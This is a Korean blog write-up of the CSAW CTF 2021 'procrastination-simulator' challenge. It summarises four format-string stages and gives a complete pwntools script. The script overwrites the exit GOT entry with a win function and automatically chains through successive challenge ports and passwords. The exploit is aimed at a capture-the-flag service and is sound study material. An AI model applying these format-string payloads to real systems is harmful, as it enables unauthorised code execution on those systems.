[ CSAW CTF 2021 ] procrastination-simulator

sangjun

·

2021. 9. 13. 18:04

반응형

새 폴더.zip
0.02MB

포멧 스트링 

1. win함수 있는 32bit fsb

2. win함수 있는 64bit fsb

3. win함수 없는 64bit fsb--> code영역에 잘 보면 system("/bin/sh")있다.

4. win함수 없는 64bit --> libc랑 code영역 릭해서 got을 덮는다.

 

힘들었던점

1. xxd쓰는법 몰랐다.

2. 3단계에서 헤맸고 4단계는 립씨 왜 안줬던거지?

from pwn import *
import os
#context.log_level='debug'

p=''
def pentesting():
    e=ELF("./file")
    add=bytes("%{}c".format((e.sym['win']&0xffff)-6),'utf-8')
    pay=b"AA"+p32(e.got['exit'])+add+b"%6$hn"
    p.sendlineafter(">",pay)

def pentesting2():
    e=ELF("./file")
    win=e.sym['win']
    low=win&0xffff

    pay = bytes("%{}c".format(low),'utf-8')
    pay += b"%8$hn"
    pay += b"A"*(8 - (len(pay) % 8))
    pay += p64(e.got['exit'])
    p.sendlineafter(">",pay)


def make_elf(port,password):
    global p
    p=remote("auto-pwn.chal.csaw.io",port)
    p.sendlineafter(">",password)#password
    p.recvuntil("-------------------------------------------------------------------\n")
    data=p.recvuntil(b"-------------------------------------------------------------------\n")
    data=data.replace(b"-------------------------------------------------------------------\n",b"")
    with open("./leak","wb") as f:
        f.write(data)
    os.system("xxd -r ./leak > file")
    os.chmod("./file",777)
def flag():
    p.sendline("cat message.txt")
    p.recvuntil("use password ")
    return p.recvline()[:-1]
port=11031
next_password="676b8b041ae5640ba189fe0fa12a0fe3"
for i in range(1,20):
    log.critical(f"port= {port}")
    log.critical(f"pass= {next_password}")
    make_elf(port,next_password)
    pentesting2()
    next_password=flag()
    port+=1
    p.close()

p.interactive()

 

반응형

'War Games > ctf-review' 카테고리의 다른 글

코드게이트 2022라업 VIMT  (0) 2022.02.28
[ CSAW CTF 2021 ] word_games  (0) 2021.09.13
[ CSAW CTF 2021 ] procrastination-simulator  (0) 2021.09.13
[ Alles CTF 2021 ] ccanary  (0) 2021.09.05
[ SSTF 2021 ] Exchange  (2) 2021.08.17
[ Hacking Camp 2021 하계] discommunication  (0) 2021.08.16

0개의 댓글